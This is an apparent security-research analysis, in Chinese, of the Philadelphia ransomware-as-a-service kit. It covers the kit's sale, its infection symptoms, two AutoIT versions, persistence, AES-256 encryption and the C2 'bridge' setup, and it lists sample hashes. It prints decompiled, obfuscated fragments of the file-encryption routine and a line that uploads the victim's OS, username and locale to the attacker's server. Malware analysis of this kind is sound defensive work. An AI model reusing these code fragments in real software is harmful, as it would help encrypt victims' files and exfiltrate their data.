最具同情心的勒索軟件套件Philadelphia。最近,一種新型的勒索軟件服務(RaaS)名為Philadelphia,開始向外以400美元的價格售賣,這個惡意軟件作者的名為Rainmaker。據Rainmaker所說,該程序套件提供一種低成本的勒索軟件服務,它允許任何一個有犯罪意圖的人發動高級的勒索軟件攻擊,并且它操作簡單,成本低。
同時,據Rainmaker介紹,Philadelphia“創新”勒索軟件服務市場,它具有自動檢測功能:當付款已經完成,然后自動解密;感染USB驅動器,并通過網絡感染其他計算機。 特別值得注意的是,“同情按鈕”將提供給賦有同情心的犯罪分子解密特定受害者的文件。 為了演示這種新的勒索軟件服務,Rainmaker創建了一個顯示其功能的PDF和視頻。
感染癥狀
當文件被加密后,文件名稱將被更改為.lock后綴的文件名。例如文件test.jpg可能會變成7B205C09B88C57ED8AB7C913263CCFBE296C8EA9938A.locked. 加密完成后會顯示下面的鎖屏圖像:
如上圖所示,受害者被要求支付0.3比特幣,并且勒索軟件聲稱加密文件的算法使用了AES-256和RSA-2048。最后勒索軟件作者將重要的事情說了3遍——發送0.3比特幣到下面的地址!!!
樣本分析
通過進一步觀察,該惡意軟件是由AutoIT腳本編寫并打包生成。通過反編譯該AutoIT惡意程序,我們發現了其中的兩個不同的版本。因此我們將分別分析它們。
V1.0
將自身拷貝到%appdata%\scvhost.exe,并且列出了待加密文件的類型:
添加開機自啟動:
待加密的目錄:
加密 加密硬盤,可移動硬盤,網絡映射:
 
經過混淆的加密文件算法:
$48E2CB6EE27D6950 &= _48E2CBFBE08D6950 ( 0 , STRINGTRIMRIGHT ( $48E02B6BE07D6950 [ $48E02B6BE07D6950 [ 0 ] ] , STRINGLEN ( ".locked" ) ) , $48E21B4BE07D6950 )
IF _48E2CB6BE0E16950 ( $48E30B6BE07D6950 , $48E2CB6EE27D6950 , $48E21B4BE07D6950 , $48E2CB6BC77D6950 ) AND NOT @ERROR THEN
_48E2BB6BE0CD6950 ( $48E30B6BE07D6950 )
用于加密的 Windows 庫函數的初始化:
$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptCreateHash" , "handle" , _48E2CBDBE00D6950 ( ) , "uint" , $48E2CB63E07D6950 , "ptr" , 0 , "dword" , 0 , "handle*" , 0 )
$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptHashData" , "handle" , $48E2CB6B407D6950 , "struct*" , $48E2CB6BE02D6950 , "dword" , DLLSTRUCTGETSIZE ( $48E2CB6BE02D6950 ) , "dword" , $48E2CB6BE0ED6950 )
$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptDeriveKey" , "handle" , _48E2CBDBE00D6950 ( ) , "uint" , $48E2CB3BE07D6950 , "handle" , $48E2CB6B407D6950 , "dword" , $48E28B6BE07D6950 , "handle*" , 0 )
$48E24B6BE07D6950 = DLLCALL ( _48E2CB64B07D6950 ( ) , "bool" , "CryptEncrypt" , "handle" , $48E27B6BE07D6950 , "handle" , 0 , "bool" , $48E2CD6BE07D6950 , "dword" , 0 , "ptr" , 0 , "dword*" , BINARYLEN ( $48E2BB6BE07D6950 ) , "dword" , 0 )
經過對上面混淆過后的代碼回溯跟蹤和分析,函數 _48E2CB6BE0E16950() 用來加密文件, 變量$48E2CB6BC77D6950是加密文件函數的一個重要參數,繼續向上找發現該變量的初始化代碼:
GLOBAL CONST $48E2CB6BC77D6950 = 26128 //0x6610 CALG_AES_256
正如惡意軟件所描述的,采用了AES-256加密算法,但是我們沒有看到RSA加密算法。
生成隨機數作為密鑰:
V2.0
新的版本在大的功能方面和核心算法方面并沒有太大的變化,故不作重復列舉,以下只列出與舊版本不同的部分。
通過反編譯我們發現,新版本的勒索軟件Philadelphia釋放了一個INI文件作為惡意軟件的配置文件。
互斥體名,UAC,C2, 提示信息:
待加密的目錄:
待加密的文件類型,釋放的文件名,文件路徑:
由此我們可以看出,新版本的惡意程序擺脫了”硬編碼”,通過設置配置文件來根據需要更改加密的具體細節。除此之外,我們在新版本中還發現一個有趣的地方:
處于好奇,我們Google此人”Fabian” ,我們發現此人很可能是 Fabian Wosar, 此人正是 Emsisoft 的反病毒研究員,繼續搜索我們發現,此前Emsisoft 宣布可以解密勒索軟件Philadelphia。 但是從代碼分析來看,新的版本加密文件的算法依然是AES-256,由此我們得出此勒索軟件加密后的文件依舊可以解密而不需要交贖金。由此再來看這段代碼,讓人啼笑皆非。
最后,惡意程序將上傳受感染者計算機的相關信息到攻擊者的服務器:
$C1 = _HL ( STRING ( $BU & "?p=Insert&osinfo=" & _HI ( @OSVERSION ) & "&user=" & _HI ( @USERNAME ) & "&country=" & _HI ( $BX ) & "&locale=" & _HI ( $BY ) & "&ucd=" & _HI ( $BZ ) ) )
勒索軟件管理客戶端
對于發動Philadelphia勒索軟件的攻擊者,他們需要在網站上安裝一個名為”網橋”的PHP腳本。 這些”網橋”將與勒索軟件感染者連接,并存儲有關受害者的加密密鑰等信息。然后,攻擊者在其計算機上運行名為Philadelphia總部的管理客戶端,該管理客戶端將連接到每個配置的”網橋”,并將受害者數據下載到其管理控制臺。 這個客戶端允許攻擊者看到誰被感染,哪些國家感染最多,甚至如果有同情心的攻擊者想允許某人免費解密他們的文件,甚至提供憐憫的按鈕。如圖:
Sha1:
9f906472665f6447dd24da499d6e0f7ebe119c82
63e74c51b8e8a2f4e5b7f4c43fd7b3e816e1b367
總結
手動分析這種基于AutoIT勒索程序樣本的難度并不大,但是通過強的代碼混淆技術,反調試,反模擬器等技術的運用,的確給殺毒軟件的識別和查殺帶來了難度。同時,勒索軟件出售服務的出現,加大了網絡攻擊的可能性,并降低了非專業技術人員實施網絡攻擊的難度,這值得我們警惕。
| 
